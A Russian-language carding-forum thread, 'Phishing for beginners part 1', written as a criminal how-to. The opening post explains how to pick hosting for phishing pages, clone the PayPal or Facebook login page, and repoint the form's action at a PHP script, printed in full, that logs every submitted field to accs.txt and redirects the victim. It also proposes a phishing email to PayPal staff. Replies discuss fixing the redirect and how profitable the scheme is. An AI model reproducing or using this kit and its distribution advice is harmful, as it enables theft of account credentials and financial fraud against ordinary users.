Акция 2024: Оплачиваем написание статей на кардинг тематику. Подробности
Перейти к содержанию
Искать в
  • Ещё...
Поиск результатов, которые содержат...
Поиск результатов в...
Авторизация  
Гость

Фишинг для новичков ч.1

Рекомендуемые сообщения

Гость
Основы фишинга. Общее представление.
Всем привет, сегодня буду рассказывать про такой род деятельности как Фишинг, которая весьма распространенная в мире кардинга.
Статья для новичков, которые еще не определились, какую отрасль в кардинге выбрать. Быть может эта статья, вдохновит на что-то... :)
Никакой ответственности не несу за то что с вами могут сделать за фишинг и во что вы можете вляпаться. Фишинг преследуемый и наказуем, так что если вы новичок, то лучше начните с
RATинга и Keylogging'a а затем уже фишинг.
Когда вы занимаетесь фишингом,вы должны себя очень сильно обезопасить.
Первым делом вам нужен очень безопасный хостинг. Я не гарантирую, что вам не надают по попе при использовании этих хостингов, но все же

Цитата

Я не даю 100% гарантии что эти хостинги абсолютно безопасны и не полицайские! Это бесплатные хостинги, но вы можете поискать платные и куда более безопасные.

Итак, когда вы определились с хостингом, пора создавать фишинг страницы.
К примеру, ваша цель Paypal (не рекомендую тем у кого нету опыта) и вам нужны логи, чтобы их получить есть два способа.

1.Использовать инструмент под названием Phish Creator - сслыка
2.Вручную

Итак, идем на PayPal login страницу (если вы собираетесь фишить Фейсбук идем на Фейсбук login страницу) и сохраняем ее.
Теперь вам нужено написать скрипт, который будет записывать все возможные вводы данных на странице. Тут я вам помочь не могу.
Шучу :) Открываем блокнот и пишем этот скрипт (как пример)

Цитата

<?php header("Location: paypal.com"); $handle = fopen("accs.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, " "); } fwrite($handle, " "); fclose($handle); exit; ?>

Вставляем этот и редактируем где необходимо,сохраняя его у нас будут все accs в accs.txt
Теперь вам нужно прилинковать эту страницу к той, которую вы сохранили ранее.
Откройте сохраненную login page редактором и найдите "action=" и смените значение на то, которое вы сохранили (создали)

Пример:

Цитата

Станет:

Цитата

Только что вы подставили свой скрипт когда пользователь подтверждал форму входа использованием команды в html. так что теперь у вас есть пароль, а пользователь перенаправлен на оригинальную страницу.
Вы практически готовы :) пора распространять вашу ссылку.

E-mail Spam- так же незаконен. Но в нашем случае мы атаковали PayPal, поэтому давайте напакостничаем в емейл админов paypal в котором мы скажем что вышло новое обновление для системы и им нужно повторно ввести свои данные :D .Ну это очень легкий, банальный и практически не рабочий способ, но на это хватило у меня фантазии в 4.00 утра :)
Проводите эксперименты, пробуйте новое, а главное думайте своей собственной головой.
Всем спасибо, удачи, безопасности и +1 к Карме :)

Специально для ccc.mn

Поделиться сообщением

да вот только после введения action="ваша страница" пользователь не будет перенаправлен на оригинальный фэйсбук или paypal.Надо в странице на которую перенаправляете сделать перенаправление с данными,которые он вписал.Выход:учить программирование(недельки хватит) или воспользоватся услугами программера,человек без знаний - туда лучше не лезть ибо получится полный звиздец,тебя спалят и будут проблемы...

Поделиться сообщением

Гость

Просмотр сообщенияE13ctr0_Z3r0 (02 March 2015 - 14:33) писал:

да вот только после введения action="ваша страница" пользователь не будет перенаправлен на оригинальный фэйсбук или paypal.Надо в странице на которую перенаправляете сделать перенаправление с данными,которые он вписал.Выход:учить программирование(недельки хватит) или воспользоватся услугами программера,человек без знаний - туда лучше не лезть ибо получится полный звиздец,тебя спалят и будут проблемы...

Во-во, правильно говоришь!

Поделиться сообщением

Довольно хорошая статья,но малополезная.
Профита минимум .
Затрат времени на рассылку(если в ручки) очень много.

Поделиться сообщением

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти
Авторизация